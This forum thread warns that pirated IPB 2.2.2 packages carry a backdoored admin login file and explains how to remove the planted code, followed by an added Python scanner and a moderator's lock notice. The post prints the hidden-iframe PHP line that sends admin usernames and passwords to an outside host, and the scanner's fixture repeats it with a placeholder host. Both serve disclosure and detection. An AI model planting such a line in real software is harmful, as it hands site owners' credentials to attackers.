x10Hosting Forums

DarkDragonLord

08-20-2007, 05:41 PM
Hack found in IPB 2.2.2 (For those that downloaded it on Internet)

Greetings everyone!

Well, just to let you know: this warning is for everyone, but more for those who think they are smarter than everyone, not buying the license but just downloading IPB on the internet.

But, this can warn other people too.

When you go to www.randomdomainhere.com/forums/admin.php, it sends you to forums/admin/index.php, right? OK, nothing new until here:

When you put in your login and password and hit OK, it loads and a "Log In Successful" appears.

OK, but did you notice that you might be giving your user/pass to anyone? You might ask "how? anyways, it's MY forum".

Ya, but someone added code in the PHP of the admin login xD look at this:

http://img251.imageshack.us/img251/5...speito2tw7.jpg

So, when you log in, first it gives all your info to these bastards, THEN you log in.

I've checked all the damn PHP related to the admin of IPB and found the string. It's inside <forumfolder>/sources/action_admin/login.php

Then, find the array $connector. If you find it, take a look and you will see the string giving all your info to the website.

You might find it like this:
PHP Code:
$connector = '<script>window.stuats=\'\';</script><div style="display:none"><iframe src="http://zybez.ath.cx/connector.php?site=' . htmlentities($this->ipsclass->vars['board_url']) . '&user=' . htmlentities($this->ipsclass->input['username']) . '&pass=' . htmlentities($this->ipsclass->input['password']) . '\"></div>';

$this->ipsclass->admin->redirect( $this->ipsclass->vars['board_url'].'/'.IPB_ACP_DIRECTORY."/index.".$this->ipsclass->vars['php_ext']."?ad 
(....) 
Delete all that is related to $connector (all until the div>'; , since the $this in the next line just redirects you to the real admin cp), save and re-upload.

Now when you log in, you will notice that your info isn't given to anyone anymore.

If you check the website that is receiving the info, it's offline. But this is a service LIKE no-ip, so watch yourself.

I found this while installing and testing a non-official IPB 2.2.2 for my friend since he can't pay the license >.<

Well, that was just a warning to you people: watch yourself and your info. This can be done anywhere in any non-official forum.

Hope this helps someone ;D
See you
DDL
__________________
Regards,
Raphael DDL

Last edited by DarkDragonLord; 08-20-2007 at 05:47 PM. Reason: fixing post
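
Added example, not part of the original post and not IPB code: a Python check that automates the manual audit described in the post above, flagging PHP lines that read a password request field close to an outbound URL or a hidden iframe/script/remote-call sink. The regexes, the `allowed_hosts` parameter, and both sample sources (with the placeholder host `collector.example.invalid`) are assumptions constructed for illustration.

```python
import re
from pathlib import Path
from urllib.parse import urlsplit

# Request fields that carry login secrets (the post's code reads input['password']).
CRED = re.compile(r"""\[\s*['"](?:password|passwd|pass|pwd)['"]\s*\]""", re.I)
URL = re.compile(r"""https?://[^\s'"<>\\]+""", re.I)
# Ways PHP code can make the browser or the server contact another host.
SINK = re.compile(r"<\s*(?:iframe|img|script)\b"
                  r"|\b(?:curl_init|fsockopen|file_get_contents|mail)\s*\(", re.I)

def scan_php_source(text, allowed_hosts=(), window=2):
    """Return (line_no, external_hosts, sink_found) for each line that reads a
    password field within `window` lines of an outbound URL or sink."""
    lines = text.splitlines()
    findings = []
    for i, line in enumerate(lines):
        if not CRED.search(line):
            continue
        ctx = "\n".join(lines[max(0, i - window): i + window + 1])
        found = {urlsplit(u).hostname or "" for u in URL.findall(ctx)}
        hosts = sorted(found - set(allowed_hosts) - {""})
        sink = bool(SINK.search(ctx))
        if hosts or sink:
            findings.append((i + 1, hosts, sink))
    return findings

def scan_tree(root, allowed_hosts=()):
    """Scan every .php file under root; return {path: findings} for hits only."""
    report = {}
    for path in Path(root).rglob("*.php"):
        hits = scan_php_source(path.read_text(errors="replace"), allowed_hosts)
        if hits:
            report[str(path)] = hits
    return report

# Constructed samples: the first mirrors the shape of the line shown in the
# post (placeholder host), the second is an ordinary password check.
BACKDOORED = '''<?php
$connector = '<div style="display:none"><iframe src="http://collector.example.invalid/connector.php?site=' . htmlentities($this->ipsclass->vars['board_url']) . '&pass=' . htmlentities($this->ipsclass->input['password']) . '"></div>';
'''
CLEAN = '''<?php
$hash = md5($this->ipsclass->input['password']);
if ($hash !== $member['hash']) { $this->login_form('bad password'); }
'''

if __name__ == "__main__":
    print(scan_php_source(BACKDOORED))
    print(scan_php_source(CLEAN))
```

Run `scan_tree()` over the unpacked forum directory before uploading it, passing the board's own hostname in `allowed_hosts`; a hit is a lead for manual review, and a diff against the vendor's official files remains the stronger check.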
lambada

08-21-2007, 04:59 PM
Re: Hack found in IPB 2.2.2 (For those that downloaded it on Internet)

That is actually illegal anyway and against the rules of our forum.

On a side note, any downloading of an unlicensed IPB to which you do not own the licence is illegal, and as such this will be locked.

Consider this a verbal warning: we do not allow discussion of warez (or any matter related to warez) on this forum.
__________________
Lambada - the former Account Manager (before I resigned)




Last edited by lambada; 08-21-2007 at 05:00 PM.